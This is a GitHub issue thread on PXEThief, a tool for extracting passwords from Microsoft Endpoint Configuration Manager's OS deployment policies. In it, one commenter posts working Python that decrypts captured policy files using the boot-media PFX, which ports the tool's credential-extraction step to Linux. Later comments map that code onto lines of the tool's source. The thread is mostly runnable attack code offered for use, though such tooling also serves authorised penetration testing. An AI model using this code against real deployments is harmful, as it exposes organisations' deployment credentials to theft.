MWR-CyberSec / PXEThief

PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager
GNU General Public License v3.0

Tool is Windows only #6

Open blurbdust opened 4 months ago

blurbdust commented 4 months ago

;)

from certipy.lib.certificate import load_pfx
from cryptography.hazmat.primitives.asymmetric import padding
from asn1crypto import cms
from Crypto.Cipher import DES3
from Crypto.Util.Padding import unpad


def decrypt_triple_des(key, iv, ciphertext):
    # 3DES-CBC with PKCS#7 padding: the content-encryption algorithm of the policy blob
    cipher = DES3.new(key, DES3.MODE_CBC, iv)
    return unpad(cipher.decrypt(ciphertext), DES3.block_size)


# Private key and certificate from the boot media PFX (password as supplied to PXEThief)
with open("_SMSTSMediaPFX.pfx", "rb") as f:
    pfx, cert = load_pfx(f.read(), b"PASSWORD")

# The policy is a CMS (PKCS#7) EnvelopedData: RSA key transport wrapping a 3DES content key
with open("pol.xml", "rb") as g:
    info = cms.ContentInfo.load(g.read())
enveloped_data = info['content']
recipient = enveloped_data['recipient_infos'].native[0]

algo = recipient['key_encryption_algorithm']['algorithm']
if algo != 'rsaes_pkcs1v15':
    raise NotImplementedError(f"{algo} not implemented yet")
# Unwrap the content-encryption key with the media private key
session_key = recipient['encrypted_key']
key = pfx.decrypt(session_key, padding.PKCS1v15())

content_info = enveloped_data['encrypted_content_info']
algo = content_info['content_encryption_algorithm']['algorithm'].native
if algo != 'tripledes_3key':
    raise NotImplementedError(f"{algo} not implemented yet")
# CBC IV is carried as the algorithm parameter (OCTET STRING)
iv = content_info['content_encryption_algorithm']['parameters'].native
ciphertext = content_info['encrypted_content'].native
decrypted_data = decrypt_triple_des(key, iv, ciphertext)
print(decrypted_data.decode('utf-16le'))
LukeLauterbach commented 3 months ago

From the ReadMe:

Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

blurbdust commented 3 months ago

I apologize, I meant to follow up with a PR with these fixes added sooner. The code above is the reimplementation of the Windows specific cryptographic functions purely in Python.

blurbdust commented 3 months ago

pfx, cert = load_pfx(f.read(), b"PASSWORD") is the replacement for https://github.com/MWR-CyberSec/PXEThief/blob/main/pxethief.py#L484

Virtually everything else is the replacement for https://github.com/MWR-CyberSec/PXEThief/blob/main/pxethief.py#L541